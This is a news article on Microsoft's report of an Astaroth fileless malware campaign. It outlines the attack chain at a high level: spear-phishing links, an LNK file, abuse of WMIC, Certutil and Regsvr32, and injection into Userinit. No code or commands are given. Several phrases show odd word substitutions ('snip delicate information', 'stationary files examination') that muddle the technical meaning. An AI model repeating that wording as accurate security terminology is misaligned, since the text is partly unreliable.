Security investigators at Microsoft have issued details of a new prevalent campaign dispensing a notorious piece of fileless malware that was mainly being found targeting European and Brazilian users earlier this year.
Called Astaroth, the malware trojan has gained traction since at least 2017 and planned to steal users’ sensitive information like their IDs, keystrokes, and other data, without dropping any executable file on the disk or fixing any software on the victim’s machine.
Astaroath, which was initially revealed by researchers at Cybereason in February this year, lived off the land by running the payload straight into the memory of a beleaguered computer or by leveraging genuine system tools, such as WMIC, Certutil, Bitsadmin, and Regsvr32, to run the malicious code.
While revising the Windows telemetry data, Andrea Lelli, a researcher at Microsoft Defender ATP Research Team, lately marked an abrupt rare spike in the usage of Management Instrumentation Command-line (WMIC) tool, resulting in the revelation of a fileless attack.
Additional investigation exposed that the attackers behind this campaign are distributing multi-stage Astaroth malware through spear-phishing emails with a malicious link to a website hosting an LNK shortcut file.
“All the payloads are Base64-encoded and decoded using the Certutil tool. Two of them result in plain DLL files (the others remain encrypted),” the researcher said in a blog post published Monday.
“The Regsvr32 tool is then used to load one of the decoded DLLs, which in turn decrypt and loads other files until the final payload, Astaroth, is injected into the Userinit process.”
This means that the malware doesn’t depend on any susceptibility exploit or outmoded trojan downloader to download anything on the targeted system. Instead, it totally depends on system tools and commands during its whole attack chain to subterfuge as a regular activity.
This method is called “living off the land” and lets the malware avoid finding from most end-point antivirus security solutions which are based on stationary files examination.
The preliminary access and implementation stages to noiselessly install the Astaroth malware on target devices have been established in the above-shown attack chain.
Once on the targeted system, Astaroth attempts to snip delicate information like credentials, keystrokes, and other data, and send it to a remote server controlled by the attackers.
The attacker can then use this stolen data to try “moving laterally across networks, carry out financial theft, or sell victim information in the cybercriminal underground,” the researcher said.
Microsoft said the various feature of its Defender ATP next-generation protection could detect such fileless malware attacks at each infection stage, while other file-centric security solutions fail to protect their customers.
Andrea said: “being fileless doesn’t mean being invisible; it certainly doesn’t mean being undetectable. There’s no such thing as the perfect cybercrime: even fileless malware leaves a long trail of evidence.”